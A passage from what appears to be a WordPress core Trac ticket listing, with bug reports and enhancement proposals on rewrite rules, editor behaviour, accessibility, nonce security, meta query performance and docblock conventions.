'([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/([^/]+)(/[0-9]+)?/?$' => 'index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&name=$matches[4]&page=$matches[5]' }}} And later on, another rule is: {{{ '([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/comment-page-([0-9]{1,})/?$' => 'index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cpage=$matches[4]' }}} The URI /2014/5/6/comment-page-2/ would end up matching the earlier rule, looking for a post named ""comment-page-2"" published on 2014-05-06, instead of looking for comment page 2 in the... I actually don't even know what the comment-page URLs do. For me, the ones that work just redirect to the date archive. I'm happy to patch this, but would like to hear from someone else on what exactly should be done done. Do the comment-page-n rules do anything? Can they just be removed?" mboynes Future Releases 54982 "In 5.9 (classic) post editor the author pulldown only lists users with ""edit_posts"" capability" Editor 5.9 normal normal Awaiting Review defect (bug) new dev-feedback 2022-01-28T21:52:56Z 2022-04-09T00:22:22Z "In WordPress 5.9 in the classic editor when editing a post, the “Author” pulldown only shows the administrators. In 5.8.3 it listed all of the authors (and contributors). Here’s the screenshot from 5.9 when using the classic editor: https://photos.app.goo.gl/zQjK441TmNKL2wJf9 It still shows all the authors (in 5.9) when I switch to the block editor. Here’s the screenshot using 5.9 with the block editor: https://photos.app.goo.gl/ZAiT1gdDHT9F6RLF7 In 5.8.3 it lists all of the Authors in the Author dropdown when using the classic editor: https://photos.app.goo.gl/qkyn4Bi3X3oDz3537 It looks like this was due to a change in the function post_author_meta_box in the file src/wp-admin/includes/meta-boxes.php It used to display all of the authors and contributors regardless of their capabilities and now it only displays users that have the ""edit_posts"" capability. Here's the commit that introduced the problem: https://github.com/WordPress/wordpress-develop/commit/0cf6d3e48d18b4e8cb932fa02bb82bf5de14a48c" joneiseman Future Releases 38109 Improvements to user deletion Users normal normal Awaiting Review enhancement new dev-feedback 2016-09-20T13:50:32Z 2019-04-01T23:06:06Z "User deletion in WordPress, at the moment, is not straightforward. When you click ""delete"" on users who have authored content, you are presented with this ultimatum: [[Image(https://i.imgur.com/11ex3hz.png)]] At my company, we build and host WP sites for clients and we almost never make decisions about content. But we do sometimes want to delete users, for instance in the situation where a person who works for a client leaves their position as they have been promoted or left for another job. In that case we would like to be able to delete the user account of that person. But without knowing how to answer the question of which user to assign their content to, we're forced to ask the client to make that decision. With a view to making it possible for sysadmins to delete users without having to consult with the client, I'd like to propose two solutions: 1. WordPress disassociates user accounts from authorship information (like in the Automattic plugin [https://wordpress.org/plugins/co-authors-plus/ co-authors-plus]) 2. WordPress allows deactivating user accounts so that the user can no longer login or reset their password, but the account still exists" tomdxw Future Releases 10425 Improvements to IIS7 Rewriting Code Permalinks 2.8.1 low normal enhancement assigned dev-feedback 2009-07-16T14:12:09Z 2019-06-04T21:03:34Z "#8974 introduced a set of functions and changes which allow to automatically generate Rewrite Rules for Wordpress installs running on IIS7. There are some issues with that implementation that I think are worth being written down and discussed somewhere so here we go: 1) There's no '''""Verbose"" option''' for IIS rules; while I can't say when it would make sense to have a verbose listing of all WordPress rewrite rules in `.htaccess`/`web.config` it might be something that should be available for both systems? 2) IIS does not add '''non wordpress rules''' (`$non_wp_rules`) to the `web.config` file (`iis7_url_rewrite_rules()`) which means that any custom rewriting which plugins/users can do on apache don't work on IIS. 3) At the moment it's assumed that there is only ONE single rule needed for IIS. Especially when looking at the merge with WPMU this is going to become a problem because WPMU uses '''multiple rules'''. Every rule has to have a unique name and functions like `iis7_rewrite_rule_exists()` and `iis7_delete_rewrite_rule()` only look for one rule with name ""wordpress"". Custom Rules (see 2) also won't work without a change here. For a partial fix see misc.php in [http://trac.mu.wordpress.org/attachment/ticket/991/991-webconfig.patch Patch on MU #991]) Any comments?" bforchhammer Future Releases 29923 Improve the writing experience on mobile Editor normal normal Future Release enhancement new dev-feedback 2014-10-11T01:01:50Z 2019-06-05T07:06:53Z "Maybe something like the screenshot attached. Problems: * In iOS, position fixed doesn't work when the keyboard is open. And that's exactly when we need it. But there are workarounds. We can absolute position everything and make only the iframe scrollable. Oh wait... * `overflow: hidden;` doesn't work on `html` and `body`. Can be worked around by using `#wpwrap` instead. We can also block scrolling completely with JS since the content we want to scroll is in an iframe. But... * For some reason Apple decided to automatically adjust the height of iframes to its content. So for this we'll need to force a specific height on the iframe, `html` and `body` tags, and make the `body` scrollable. Seems to work. * There are no events fired when the keyboard shows or hides. Also no resize event. The keyboard kind of floats over the window. This means that the window height doesn't change and that we can't detect the height of the visible area and keyboard. But it's possible to work around that too. :) The screenshot is from a working prototype. Ideally there should be a left and right arrow on the toolbar so you can browse the tools. The post.php screen stays mostly the same, with a preview of the content. When you click on it, it goes ""fullscreen"". When you hide the keyboard or tab away, it goes back to the original screen. The alternative is to leave things as they are, with the toolbar unpinned on top of the editor, but we could still move all the buttons to one row with arrows to browse them." iseulde Future Releases 48193 Improve the WordPress loop Query normal normal Awaiting Review enhancement new dev-feedback 2019-10-01T18:53:57Z 2024-01-20T15:01:13Z "Currently, there are a number of ways that the ""loop"" can be handled in WordPress. Each depends on whether you are using the WP_Query global, a custom WP_Query instance, or an array of posts. I propose that we add a PHP 5.6+ compatible generator function called `wp_loop()` that will simplify all of these use cases into a single, more modern approach. See [https://wpscholar.com/blog/creating-better-wordpress-loop/]" wpscholar Future Releases 39441 Improve the Settings API for accessibility and ease of use. Plugins normal normal Future Release enhancement new dev-feedback 2017-01-02T21:58:14Z 2023-01-10T18:32:17Z "Today a kickoff meeting for the Settings API took place on Slack (Archive: https://wordpress.slack.com/archives/accessibility/p1483376507000492) where we discussed ways to improve it, both in terms of accessibility and ease of use. After a good discussion we came to the conclusion that we would like to focus on the existing Settings API for now and do what we can to improve it. The Fields API project will eventually make the process of registering settings and having them automatically rendered even easier and complete, but we should not wait until it is ready for a core-merge, as some issues in the existing Settings API should be solved sooner than later. We figured out two main goals: * Add some basic support to automatically render fields so that plugin developers no longer need to write their own callback functions for basic fields. * Get rid of the table structure to improve accessibility. Furthermore the accessibility team should also ensure that the markup generated as the core field output is accessible. For the technical improvements, we would like to do the following: * Adjust `add_settings_field()` to support a predefined set of identifiers for a field type instead of a callback function. In that case a default callback function that we would introduce in core would take care of rendering the field. The requirement to write custom callbacks for even the most basic fields is one major issue with the current Settings API and why most people rely on external libraries for that. * Enhance the `$args` parameter of `add_settings_field()`. It should become more significant and probably go through some validation, filling it with default values. This is especially important for the new default callbacks. * Possibly support providing one `$args` array as sole parameter to `add_settings_field()` that contains the other parameters as well. This would of course need to work in a backward-compatible way. For the accessibility part, we would like to do the following: * Scaffold an HTML prototype for what a settings page should look like. This will give a good overview of the accessibility approach we should take without having to deal with the PHP implementation. * Get rid of the current table structure. Whatever the above prototype looks like, it will not have tables anymore. We can generally remove the table structure and change it to something else easily, since all the table output is generated by core (in particular by `do_settings_sections()` and `do_settings_fields()`). For everyone who uses the API as recommended, this will not bring any BC issues unless they are using specific table-related selectors (like `td`) in CSS or JS code. It is unclear whether these should be considered edge-cases and whether a dev-note reflecting the changes is sufficient, or whether we should only support the new markup through an additional parameter which would default to the current `table` way. The latter is backward-compatible, but on the other hand it would decrease the amount of sites that become more accessible out-of-the-box. * Do not deal with people who completely write the table markup manually. We simply cannot do this, other than recommending them to switch to using the Settings API or at least changing their markup. The only thing to keep in mind here is that we should never remove any CSS related to these tables, in order to keep their code working. All of these enhancements would also benefit #38734 as it would become a lot easier to change core's own settings pages to actually use the Settings API. We will from now on have meetings on Slack to continue discussion in detail every 2 weeks on Monday at 17:00 UTC. However, general opinions and discussion can and should also be placed in this ticket." flixos90 Future Releases 50486 Improve the admin notices accessibility joedolson* Administration normal normal 6.6 defect (bug) accepted dev-feedback 2020-06-27T12:53:09Z 2024-02-20T15:22:45Z "Follow-up to #47656. See also #50442/ The admin notices accessibility has room for improvements. Currently, all the admin notices are just text printed out on the admin pages. They have no special semantics. There are no mechanisms to inform users some important information is printed on the page other than visuals. There are no methods to navigate directly to admin notices nor established standards on their placement. This way, users with accessibility needs will likely miss important information, as they may have no clue whether and where these messages are printed out. Depending whether the admin notices are PHP-generated notices that appear after a page load or JavaScript-generated ones that are ""injected"" into the DOM, there are ways to improve their accessibility. At the very least, the following improvements should be considered, some of them were mentioned in #47656. == All notices - establish standards for the admin notices placement in the page: there should be one, well defined, area where notices are printed out (recommended: after the main H1) - establish standards for the admin notices content: see the discussion related to the ""text prefix"" on #47656 and #50442 - the above item should apply to the whole WordPress UI, including the block editor - ""inline"" notices (the ones printed out in the middle of the page): make a decision whether to keep them or allow only notices at the top of the page - if ""inline"" notices are kept, explore ways to make them more accessible - worth considering admin notice should be visually prominent and appear within the initial viewport anyways - consider the introduction of a dedicated PHP class with methods to get / print admin notices and additional features, also keeping into consideration [https://make.wordpress.org/core/2019/08/05/feature-project-proposal-wp-notify/ the WP Notify project] and the recent [https://make.wordpress.org/core/2020/06/15/call-for-feedback-wp-notify-v1-requirements-document/ call for feedback on the WP Notify v1 requirements document] == PHP notices - prepend to the document title a short text to inform users there are notices and their number: the document title is the first thing screen readers announce after a page load - the notices should be printed out after the main H1 heading as that's the part of the content with higher chances to be navigated to - define the page area where notices are printed out with an ARIA role that's also a landmark role, e.g. `complementary` (an `<aside>` element) or other role that is a landmark - add a new ""skip link"" after the ""Skip to main content"" one to allow all keyboard users to jump to the notices area: this skip link should only be printed out when there are notices == JavaScript notices - all notices injected in the DOM should have an ARIA role `alert` or `status` depending on their ""politeness"" level, so that they're automatically announced by screen readers Any additional suggestion and/or technique to improve the admin notices accessibility is very welcome." afercia Future Releases 50389 Improve support for site health issues in WordPress Site Health 5.2 normal normal Awaiting Review enhancement reopened dev-feedback 2020-06-15T04:23:12Z 2020-06-15T20:28:10Z "after we upgraded to wordpress 5.4, we are getting these performance issues. this is what was mentioned in the site health report. can you pl tell us how to fix them? PHP modules perform most of the tasks on the server that make your site run. Any changes to these must be made by your server administrator. The WordPress Hosting Team maintains a list of those modules, both recommended and required, in the team handbook (opens in a new tab). Warning The optional module, imagick, is not installed, or has been disabled. Warning The optional module, zip, is not installed, or has been disabled." evapparao Future Releases 50510 Improve security of wp_nonce implementation Security normal normal Awaiting Review enhancement new dev-feedback 2020-06-29T15:21:47Z 2023-07-11T00:49:56Z "The current wp_nonce implementation is a little out dated and should be improved. While nonces aren't security, a strong nonce implementation can provide some security against form field manipulation. I have attached a mu-plugin I wrote to test a new nonce algorithm. I will convert it to a patch if there is interest in improving this in core. I have been running this mu-plugin on several high traffic sites I manage with no issues for over 6 months now." chaoix Future Releases 37656 Improve plugin bootstrapping processes Plugins normal normal Awaiting Review enhancement new dev-feedback 2016-08-14T11:32:28Z 2019-12-13T19:04:03Z "I recently thought about if we could make bootstrapping plugins easier and take away some common tasks that (should) happen in every plugin. It would also be nice to have a general plugin class registry. What I was thinking of is to introduce an abstract class `WP_Plugin` that plugin developers can extend for their plugin's main class. Then they would call a new function `register_plugin( __FILE__, $plugin_class_name )` to register that class with WordPress. We could take some regular processes away from the developer and, by doing that, also make sure that they don't implement it the wrong way. For example, we could take care of plugin installation routines: If the class implements a static method `install()`, the base class `WP_Plugin` would register an activation hook to an internal function that takes care of whether the plugin is activated network-wide. The actual `install()` method would only contain those steps necessary for the setup on the current site (`WP_Plugin` would take care of switching sites as appropriate). Many plugin developers overlook Multisite in their setup routines, causing the plugin to only install on the main site although being network-activated. We could also deal with other tasks, like hooking the `bootstrap()` method of the plugin class in `plugins_loaded` or `muplugins_loaded` (detected by the base class). I think this whole concept could improve the way plugins initialize themselves. It would not be mandatory (since several plugins don't even use classes), but it would become a best practice. This is just an idea that I wanted to throw on Trac to discuss about it. If we get to the point that we agree this is a good idea, we would need to come up with actual details (of which I don't have any yet)." flixos90 Future Releases 45023 Improve parent and child category description example Taxonomy normal minor Awaiting Review enhancement new dev-feedback 2018-10-02T15:10:28Z 2018-10-03T17:56:54Z "The descriptive text under the Parent Category section of the Category page describes an example that may not be as easily understood or translatable compared to more universally translated words. Before: parent category ""jazz"" + child categories ""bebop"" and ""big band"". Screenshot: https://cloudup.com/inms-imkM-I After: parent category ""music"" + child categories ""jazz"" and ""rock"". Screenshot: https://cloudup.com/i31WAPdv7Wp This ticket proposes changing the description to the ""after"" example. Please see attachment below." joanrho Future Releases 24925 Improve no disk space error handling when updating plugins Filesystem API normal minor Awaiting Review enhancement new dev-feedback 2013-08-02T11:25:24Z 2021-07-20T23:02:17Z "I received the following uninformative error message when trying to update a plugin (roughly translated from Finnish): {{{ Error on updating BulletProof Security. Cannot create folder. /[WPDIR]/wp-content/upgrade/bulletproof-security.tmp. }}} The error was caused by not having enough disk space. The plugin update should check if that's the reason for the error and then display a more informative error message." Daedalon Future Releases 49278 Improve meta query Query 5.3.2 normal normal Future Release enhancement new dev-feedback 2020-01-23T16:32:32Z 2023-01-03T20:14:48Z "When having a couple of Meta Query statements in WP_Query the query becomes very slow. I think this is because of the way the JOINs are created. Currently the JOINs are only done on the Post ID. The JOIN can become enormous, which means that filtering (the WHERE part) will take a lot of time. I checked /wp-includes/class-wp-meta-query.php and posted the code between line 557 and 573 . {{{ // JOIN clauses for NOT EXISTS have their own syntax. if ( 'NOT EXISTS' === $meta_compare ) { $join .= "" LEFT JOIN $this->meta_table""; $join .= $i ? "" AS $alias"" : ''; if ( 'LIKE' === $meta_compare_key ) { $join .= $wpdb->prepare( "" ON ($this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column AND $alias.meta_key LIKE %s )"", '%' . $wpdb->esc_like( $clause['key'] ) . '%' ); } else { $join .= $wpdb->prepare( "" ON ($this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column AND $alias.meta_key = %s )"", $clause['key'] ); } // All other JOIN clauses. } else { $join .= "" INNER JOIN $this->meta_table""; $join .= $i ? "" AS $alias"" : ''; $join .= "" ON ( $this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column )""; } }}} Apparantly when using the 'NOT EXISTS' compare the 'AND $alias.meta_key' part is added to the JOIN, but when NOT using the 'NOT EXISTS' compare this part is not there. This means that when NOT using the 'NOT EXISTS' compare the a lot of data is joined in the temporary data set. I played with this part a bit and when adding the 'AND $alias.meta_key' part to those JOINs as well it sped up my query a lot. My query went from 38 seconds to 0.01 seconds with the same results. My 'test' code: {{{ // JOIN clauses for NOT EXISTS have their own syntax. if ( 'NOT EXISTS' === $meta_compare ) { $join .= "" LEFT JOIN $this->meta_table""; $join .= $i ? "" AS $alias"" : ''; if ( 'LIKE' === $meta_compare_key ) { $join .= $wpdb->prepare( "" ON ($this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column AND $alias.meta_key LIKE %s )"", '%' . $wpdb->esc_like( $clause['key'] ) . '%' ); } else { $join .= $wpdb->prepare( "" ON ($this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column AND $alias.meta_key = %s )"", $clause['key'] ); } // All other JOIN clauses. } else { $join .= "" INNER JOIN $this->meta_table""; $join .= $i ? "" AS $alias"" : ''; $valid_compares = array( '=', '!=', '>', '>=', '<', '<=', 'IN', 'NOT IN', 'EXISTS', ); if( in_array($meta_compare, $valid_compares ) && !empty($clause['key']) && 'LIKE' !== $meta_compare_key ) { $join .= $wpdb->prepare( "" ON ( $this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column AND $alias.meta_key = %s )"", $clause['key']); } else { $join .= "" ON ( $this->primary_table.$this->primary_id_column = $alias.$this->meta_id_column )""; } } }}} I'm not really sure if this works in all cases (with all compare/compare_key variations), but I think it would be good to check it out (on Github I've seen that the last improvements here have been done at least 2 years ago). For now I 'solved' my slow query by parsing the JOIN and WHERE on the filter 'get_meta_sql' and add the 'AND' part in the JOIN. Below the query that gets created before and after the changes. Query before (38 seconds): {{{ SELECT SQL_CALC_FOUND_ROWS riff19_posts.ID FROM riff19_posts INNER JOIN riff19_postmeta ON ( riff19_posts.ID = riff19_postmeta.post_id ) INNER JOIN riff19_postmeta AS mt1 ON ( riff19_posts.ID = mt1.post_id ) INNER JOIN riff19_postmeta AS mt2 ON ( riff19_posts.ID = mt2.post_id ) INNER JOIN riff19_postmeta AS mt3 ON ( riff19_posts.ID = mt3.post_id ) JOIN riff19_icl_translations wpml_translations ON riff19_posts.ID = wpml_translations.element_id AND wpml_translations.element_type = CONCAT('post_', riff19_posts.post_type) WHERE 1=1 AND ( ( riff19_postmeta.meta_key = 'pinplugin_event_start_date' AND CAST(riff19_postmeta.meta_value AS DATE) < '2020-01-23' ) OR ( ( ( mt1.meta_key = 'pinplugin_event_start_date' AND CAST(mt1.meta_value AS DATE) = '2020-01-23' ) AND mt2.meta_key = 'pinplugin_event_start_time' AND ( mt3.meta_key = 'pinplugin_event_end_time' AND CAST(mt3.meta_value AS TIME) <= '17:19:19' ) ) ) ) AND riff19_posts.post_type = 'event' AND (riff19_posts.post_status = 'publish' OR riff19_posts.post_status = 'acf-disabled' OR riff19_posts.post_status = 'private') AND ( ( ( wpml_translations.language_code = 'nl' OR 0 ) AND riff19_posts.post_type IN ('post','page','attachment','wp_block','location','person','news','blog','case','service','event','vacancy','whitepaper' ) ) OR riff19_posts.post_type NOT IN ('post','page','attachment','wp_block','location','person','news','blog','case','service','event','vacancy','whitepaper' ) ) GROUP BY riff19_posts.ID ORDER BY riff19_posts.menu_order, CAST(riff19_postmeta.meta_value AS DATE) DESC, CAST(mt2.meta_value AS TIME) DESC, CAST(mt3.meta_value AS TIME) DESC LIMIT 0, 12 }}} Query after (0.0028 seconds): {{{ SELECT SQL_CALC_FOUND_ROWS riff19_posts.ID FROM riff19_posts INNER JOIN riff19_postmeta ON ( riff19_posts.ID = riff19_postmeta.post_id AND riff19_postmeta.meta_key = 'pinplugin_event_start_date') INNER JOIN riff19_postmeta AS mt1 ON ( riff19_posts.ID = mt1.post_id AND mt1.meta_key = 'pinplugin_event_start_date') INNER JOIN riff19_postmeta AS mt2 ON ( riff19_posts.ID = mt2.post_id AND mt2.meta_key = 'pinplugin_event_start_time') INNER JOIN riff19_postmeta AS mt3 ON ( riff19_posts.ID = mt3.post_id AND mt3.meta_key = 'pinplugin_event_end_time') JOIN riff19_icl_translations wpml_translations ON riff19_posts.ID = wpml_translations.element_id AND wpml_translations.element_type = CONCAT('post_', riff19_posts.post_type) WHERE 1=1 AND ( ( riff19_postmeta.meta_key = 'pinplugin_event_start_date' AND CAST(riff19_postmeta.meta_value AS DATE) < '2020-01-23' ) OR ( ( ( mt1.meta_key = 'pinplugin_event_start_date' AND CAST(mt1.meta_value AS DATE) = '2020-01-23' ) AND mt2.meta_key = 'pinplugin_event_start_time' AND ( mt3.meta_key = 'pinplugin_event_end_time' AND CAST(mt3.meta_value AS TIME) <= '17:18:05' ) ) ) ) AND riff19_posts.post_type = 'event' AND (riff19_posts.post_status = 'publish' OR riff19_posts.post_status = 'acf-disabled' OR riff19_posts.post_status = 'private') AND ( ( ( wpml_translations.language_code = 'nl' OR 0 ) AND riff19_posts.post_type IN ('post','page','attachment','wp_block','location','person','news','blog','case','service','event','vacancy','whitepaper' ) ) OR riff19_posts.post_type NOT IN ('post','page','attachment','wp_block','location','person','news','blog','case','service','event','vacancy','whitepaper' ) ) GROUP BY riff19_posts.ID ORDER BY riff19_posts.menu_order, CAST(riff19_postmeta.meta_value AS DATE) DESC, CAST(mt2.meta_value AS TIME) DESC, CAST(mt3.meta_value AS TIME) DESC LIMIT 0, 12 }}}" jillebehm Future Releases 32653 Improve Linkback Presentation Pings/Trackbacks normal normal Awaiting Review enhancement new dev-feedback 2015-06-15T12:04:10Z 2017-02-14T20:31:27Z "The current default presentation for linkbacks(pingbacks and trackbacks) does not encourage their use. Currently,the presentation looks something like this: […] A pingback example. […] People have complained that the utility of linkbacks has been overshadowed by their use as a vector for DDOS attacks and spam. The recent improvements to Press This show we can do better in presentation of linked content. The pingback specification is a bit vague in terms of presentation suggestions, stating: ""Bob's blog also retrieves other data required from the content of Alice's new post, such as the page title, an extract of the page content surrounding the link to Bob's post, any attributes indicating which language the page is in, and so forth."" I am proposing by default we switch to a default with improved readability and more consistent with the user experience on other websites. For example, a basic linkback should display the author/site name, the name of the linked content, etc, rather than the summary, and that information stored as comment meta. This would look more like a citation. That display could be (optionally) progressively enhanced by other factors, for example, page markup such as MicroFormats, Microdata, or OpenGraph(popularized by Facebook), etc to add a better experience if the linked site supports it. The basic point is that linkbacks are unusable by people in their current form, but the idea of letting people know you linked to their content is a good one. It encourages conversation and interaction. I think we just need to make it a better experience. Otherwise, everyone just turns it off. I'm aware the above could be done by a plugin(and may start as a 'feature' plugin), however I think the basic structure of this change belongs in core." dshanske Future Releases 60091 Improve language dropdown usability I18N normal normal Awaiting Review defect (bug) assigned dev-feedback 2023-12-18T09:08:05Z 2024-03-15T01:58:53Z "**Issue** A: When selecting Indian languages like Malayalam, Tamil, Kannada etc, the default choice on the front end are മലയാളം, தமிழ் etc. The issue with this is, with the default keys on the keyboard, one cannot select the language, as it follows the QWERTY format(of A-Z). So the user will have to go through each and every element in the list. ALso B: Languages like Tamil given twice. Possible reason one is Indian Tamil and other is Srilankan Tamil. But on the frontend it is written as""தமிழ்"". So identifying which is what is difficult for the user. And also the difference in completed translations could be an issue in the future. Refer Image **What could be done.** Give the English word for the language next to Indian languages, മലയാളം (Malayalam), தமிழ் (Tamil_IN), தமிழ் (Tamil_LK) and make it searchable. So when 'മ' is not available on keyboard then ""M"" is typed and മലയാളം (Malayalam) should be shown on the list. Also if possible rather than it being completely dropdown a textbox with dropdown would be a good option. " alanjacobmathew Future Releases 59233 Improve error handling for unserialize() General normal normal 6.6 task (blessed) new dev-feedback 2023-08-28T23:47:32Z 2024-02-26T22:05:20Z "From https://core.trac.wordpress.org/ticket/59231: > === [https://wiki.php.net/rfc/unserialize_warn_on_trailing_data Make unserialize() emit a warning for trailing bytes] > > While based on the current test suite, WP is not ''directly'' affected by this, the [https://developer.wordpress.org/reference/functions/maybe_unserialize/ `maybe_unserialize()`] function could still be confronted by data with trailing bytes. > > However, the call to the PHP native `unserialize()` within `maybe_unserialize()` silences all (PHP 8.0+: non-fatal) errors, so this new warning will not affect WP or its ecosystem as long as the `maybe_unserialize()` function is used. > > Having said that, a critical look at `maybe_unserialize()` may be warranted as the new warning in PHP is related to security issues discovered in other projects, so WP may want to consider rejecting unserialization for data throwing this warning. > > Also note that there are 7 uses of `unserialize()` in total within WP Core, one within `maybe_unserialize()`, but the function is also used in 6 other places and 5 of those do not use error silencing. > > > === [https://wiki.php.net/rfc/improve_unserialize_error_handling Improve unserialize() error handling] > > This, again, affects the [https://developer.wordpress.org/reference/functions/maybe_unserialize/ `maybe_unserialize()`] function and this time, the code should probably be adjusted to handle the new errors which `unserialize()` can now throw. > > The change does not affect unserializing valid data, but in the case of invalid data, the type of and severity of the notices/warnings/catchable exceptions have been changed. > > All 7 uses of `unserialize()` in WP Core should be reviewed and for the 6 uses outside of the `maybe_unserialize()` function, it should be reviewed whether they can/should switch to using `maybe_unserialize()` and/or whether they should get their own (improved) error handling. " jrf Future Releases 41081 Improve Custom Menu widget, show notification if menu is empty or no menu selected mdifelice Widgets 4.9 normal normal Future Release enhancement assigned dev-feedback 2017-06-16T13:33:58Z 2022-06-08T19:34:41Z "If you choose a menu for Custom Menu widget and we remove all items in that menu OR the menu is not selected -> nothing shows on the page. Maybe we should add a text message that will inform the user that the menu is empty or is not selected?" alexvorn2 Future Releases 39418 "Improve ""Empty Spam"" and ""Empty Trash"" user experience" Administration 2.5 normal normal Awaiting Review enhancement new dev-feedback 2016-12-28T18:04:55Z 2018-08-20T06:57:38Z "Now that plugins are doing more with post types, and dealing with sometimes hundreds of thousands of entries in the posts table, emptying spam and/or trash is starting to feel a little outdated. When there is a need to empty many spam or trashed items, it's not uncommon for this page to timeout, or to reload in the browser in such a way that rendering is blocked while the server processes the mass deletion of content. In my imagination, it would be a nice improvement to fallback to the current behavior for `noscript`, but to leverage the power of javascript being asynchronous to provide some kind of modal window to chug through the process, maybe with a progress bar and some basic error feedback if the empty action fails for any reason." johnjamesjacoby Future Releases 49258 Improper Session Termination Users 5.1.1 normal normal Awaiting Review enhancement new dev-feedback 2020-01-21T09:45:13Z 2023-08-23T05:37:46Z After Logout into wordpress back-end when we press “Back” button of the browser an authenticated page got displayed without entering any valid credentials. vishal05 Future Releases 45381 importer should remap attachment IDs when they appear in a block's attributes Import normal normal Awaiting Review enhancement new dev-feedback 2018-11-19T18:07:45Z 2021-12-22T19:20:43Z "Related: https://github.com/WordPress/gutenberg/issues/10535 > One idiosyncrasy of the WordPress Importer is that attachment ids can change in the import process. If an existing WordPress site already has a number of posts, those existing post ids can conflict with the post ids included in the import file. > > To accommodate the changing ids, the WordPress Importer has backfill_parents() (ref) and remap_featured_images() (ref). Both of these methods use a mapping of old=>new post ids to update existing references to the old ids. > > Along the same lines, Image Blocks will need their attachment ids updated, otherwise they can end up in a crashed state. To replicate what the user will experience, simply insert an Image Block and change its attachment id reference to an invalid id: I've done some experimenting and the mods to importer to support such remapping are fairly minor. Before submitting a patch I'll have to account for the recent change in the Gallery block (https://github.com/WordPress/gutenberg/pull/11540). The mods I have work only if the attachments in question are included in the same export/import as the posts that have blocks that reference them. For example, if you export posts separately from Media and do 2 separate imports the IDs are not remapped. If the attachments are not included in the same export as the posts that reference them, then the importer currently does not remap the URLs in post_content either whether the media is referenced in a block or in ""classic"" content (i.e., they still point to URLs on the exporting host)...so I do not think that is a major flaw in what I've written :-) I do not see any way around that, but wanted to mention it in case anyone has any bright ideas...before I finalize and submit that patch." pbiron Future Releases 56060 Implement wp_cache_replace_multiple() – and related WP_Object_Cache method Cache API normal normal Future Release enhancement new dev-feedback 2022-06-24T02:50:19Z 2023-04-20T17:53:59Z "See: #20875, #54574. See also: https://github.com/WordPress/wordpress-develop/pull/2018#discussion_r799643985 🫠 I would like to replace multiple values in a cache, but not `add` or `set` them if they do not exist. In my experience and understanding, `replace()` doesn't get much love because `_exists()` may be impossible to implement in certain backends – specifically (or especially) when `$group` is empty. My current situation is essentially juggling multiple backends, and only wanting to replace multiple values if they exist on one server and not add or set them until some other unrelated things happen. I went to call `wp_cache_replace_multiple()` and thought my IDE had deceived me when it wasn't autocompleting. Alas! Alas, I say! I can handle this In my own drop-in, and I can account for it in my own codes, but I think perhaps it's worth reconsidering this in core for the sake of parity with everything else. Thoughts?" johnjamesjacoby Future Releases 48207 Implement new Comment Date Functions Date/Time normal normal Awaiting Review defect (bug) new needs-unit-tests 2019-10-04T03:33:42Z 2019-11-08T11:42:21Z WordPress 5.3 introduces get_post_datetime() and get_post_timestamp(). Suggesting that these be mirrored with the equivalent functions get_comment_datetime and get_comment_timestamp. dshanske Future Releases 51334 Implement enhanced post_status transition capabilities Role/Capability normal normal Awaiting Review feature request new dev-feedback 2020-09-17T22:32:34Z 2020-09-18T11:49:05Z "WordPress has some publishing related capabilities for post types including: `publish_posts`, `edit_published_posts` While working on multiple project with some custom user roles and while working on #47443 I noticed there could be some use cases that require more capabilities based on posts-status-changes. == Example use case When a user has the `edit_published_posts` but not `publish_posts` capability they can edit an already published posts but not publish a new posts/draft post. By editing a published post they can (accidentally) unpublish a post. If they did this by mistake, they don't have the possibility to revert this change. In most scenarios this is not intended. I can think about two ways how to solve this problem. == Solving this problem with an additional post type capability So I think an additional capability could be added which is responsible from switching from a published post_status to an unpublished status. == Solving this problem using filter hooks Because the solution is a bit unflexible I could also think about implementing a similar functionality by introducing one or more filter hooks like: - `can_transition_post_status` with a boolean value and the current and new status as additional arguments - `can_transition_{old_status}_to_{new_status}` with a boolean value and the post id as an additional argument Those filter hooks could be similar to the post transition action hook https://codex.wordpress.org/Post_Status_Transitions But those filters would run before updating the post." derweili Future Releases 49277 Implement email sanitize in REST API spacedmonkey REST API 4.4 normal normal Future Release enhancement assigned dev-feedback 2020-01-23T15:08:18Z 2021-11-04T15:46:35Z Implement email sanitize in REST API over just using `sanitize_text_field` spacedmonkey Future Releases 57299 Implement array key type notation General normal normal Awaiting Review enhancement new dev-feedback 2022-12-08T22:42:41Z 2022-12-08T23:56:33Z "I'd like to propose that array key type notation is introduced into PHP docblocks where appropriate. This notation uses the syntax `array<key-type, value-type>` for arrays, for example a list containing strings is documented thus: {{{#!php /** * @param array<int, string> $foo */ }}} An associative array of booleans (where the shape is not known) is documented thus: {{{#!php /** * @param array<string, bool> $foo */ }}} The benefit of this syntax over, for example, `string[]` or `array<string>` is it allows the types of the array keys to be specified. This allows both lists and associative arrays to be documented more completely even when their shape is not known. When used in combination with a static analysis tool such as PHPStan this allows for greater type safety and more accurate analysis of structures such as array access and array iteration. It allows developers looking at the documentation to understand the type of the array keys, and thus whether an array is a list or associative. That said, I appreciate that this syntax is comparatively rare within the WordPress ecosystem and therefore can be foreign to developers who've not seen it elsewhere. This notation is supported by all of the static analysis tools and code editors (either natively or via a PHP add-on) that I could find, including VS Code, PHPStorm, Sublime Text, PHPStan, Psalm, and Phan, and it's used by countless other frameworks and libraries such as Symfony, Laravel, and PHP Parser. It's not a new syntax, it's just new to WordPress core. == Benefits * Increased awareness of whether an array is a list or an associative array for developers reading inline documentation * Increased accuracy provided to static analysis tools * Increased accuracy in editors and IDEs that either natively support this syntax or support the PHP implementation of the language server protocol == Concerns * Syntax that can be jarring for developers who've not seen it before * Not part of a phpDocumentor or PSR-5 PHPDoc standard (although PSR-5 has been stalled for 9 years so probably not a concern) == Implementation Much like the general ongoing improvements to inline docs, this will be a gradual process. There won't be a patch or PR that updates all the existing `type[]` notation at once. Any objections?" johnbillion Future Releases 14172 Implement $scheme in site info in ms-sites edit site Networks and Sites 3.0 normal normal enhancement assigned dev-feedback 2010-07-01T22:45:33Z 2021-01-05T16:40:51Z "In WordPress 3.0 with Network enabled, if you were to click: Super Admin -> Sites -> Edit (next to any site) and then change any of the Site Options i.e. 